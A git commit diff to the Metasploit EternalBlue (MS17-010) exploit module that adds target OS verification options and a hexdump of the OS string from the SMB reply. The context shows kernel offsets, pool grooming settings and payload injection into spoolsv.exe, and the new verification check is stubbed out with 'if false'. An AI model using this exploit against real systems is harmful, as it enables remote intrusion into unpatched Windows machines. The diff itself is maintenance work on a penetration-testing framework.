add core buffer dump for OS version

zerosum0x0 · zerosum0x0 · commit 6fb4040d1128 · 2017-05-16T23:18:39.000-06:00
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -60,11 +60,12 @@ def initialize(info = {})
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows 7 and Server 2008 (x64) All Service Packs',
+          [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',
             {
               'Platform'       => 'win',
               'Arch'           => [ ARCH_X64 ],
 
+              'os_patterns'    => ['Server 2008 R2', 'Windows 7'],
               'ep_thl_b'       => 0x308,  # EPROCESS.ThreadListHead.Blink offset
               'et_alertable'   => 0x4c,   # ETHREAD.Alertable offset
               'teb_acp'        => 0x2c8,  # TEB.ActivationContextPointer offset
@@ -82,7 +83,9 @@ def initialize(info = {})
         OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
         OptInt.new( 'MaxExploitAttempts', [ true,  "The number of times to retry the exploit.", 3 ] ),
         OptInt.new( 'GroomAllocations', [ true,  "Initial number of times to groom the kernel pool.", 12 ] ),
-        OptInt.new( 'GroomDelta', [ true,  "The amount to increase the groom count by per try.", 5 ] )
+        OptInt.new( 'GroomDelta', [ true,  "The amount to increase the groom count by per try.", 5 ] ),
+        OptBool.new( 'VerifyTarget', [ true,  "Check if remote OS matches exploit Target.", true ] ),
+        OptBool.new( 'VerifyArch', [ true,  "Check if remote architecture matches exploit Target.", true ] )
       ])
   end
 
@@ -133,14 +136,6 @@ def exploit
     end
   end
 
-  #
-  # Increase the default delay by five seconds since some kernel-mode
-  # payloads may not run immediately.
-  #
-  def wfs_delay
-    super + 5
-  end
-
   def smb_eternalblue(process_name, grooms)
     begin
       # Step 0: pre-calculate what we can
@@ -150,9 +145,16 @@ def smb_eternalblue(process_name, grooms)
 
       # Step 1: Connect to IPC$ share
       print_status("Connecting to target for exploitation.")
-      client, tree, sock = smb1_anonymous_connect_ipc()
+      client, tree, sock, os = smb1_anonymous_connect_ipc()
       print_good("Connection established for exploitation.")
 
+      if not verify_target(os)
+        return
+      end
+
+      #if not verify_arch
+      #end
+
       print_status("Trying exploit with #{grooms} Groom Allocations.")
 
       # Step 2: Create a large SMB1 buffer
@@ -207,6 +209,52 @@ def smb_eternalblue(process_name, grooms)
     end
   end
 
+  def verify_target(os)
+    ret = true
+
+    if datastore['VerifyTarget']
+      if false
+        los = os.downcase
+        #if los.include 'server 2008 r2' or os =~ /windows 7/i
+        print_warning("Target OS selected not valid for OS indicated by SMB reply")
+        print_warning("Disable VerifyTarget option to proceed manually...")
+        ret = false
+      end
+      print_status("Target OS selected valid for OS indicated by SMB reply")
+    end
+
+    # cool buffer print no matter what, will be helpful when people post debug issues
+    print_core_buffer(os)
+
+    return ret
+  end
+
+  def print_core_buffer(os)
+    os = os.gsub("\x00", '') # don't do the unicode
+    os << "\x00" # but original has a null
+
+    print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
+
+    count = 0
+    chunks = os.scan(/.{1,16}/)
+    chunks.each do | chunk |
+      hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, "0") }.join(" ")
+
+      format = "0x%08x  %-47s  %-16s" % [(count * 16), hexdump, chunk]
+      print_status(format)
+      count += 1
+    end
+  end
+
+  #
+  # Increase the default delay by five seconds since some kernel-mode
+  # payloads may not run immediately.
+  #
+  def wfs_delay
+    super + 5
+  end
+
+
   def smb2_grooms(grooms, payload_hdr_pkt)
     grooms.times do |groom_id|
       gsock = connect(false)
@@ -232,9 +280,16 @@ def smb1_anonymous_connect_ipc()
 
     client.user_id = response.uid
 
+
+    # todo: RubySMB throwing exceptions
+    # sess = RubySMB::SMB1::Packet::SessionSetupResponse.new(raw)
+    os = raw.split("\x00\x00")[-2]
+    # todo: rubysmb should set this automatically?
+    #client.peer_native_os = os
+
     tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
 
-    return client, tree, sock
+    return client, tree, sock, os
   end
 
   def smb1_large_buffer(client, tree, sock)
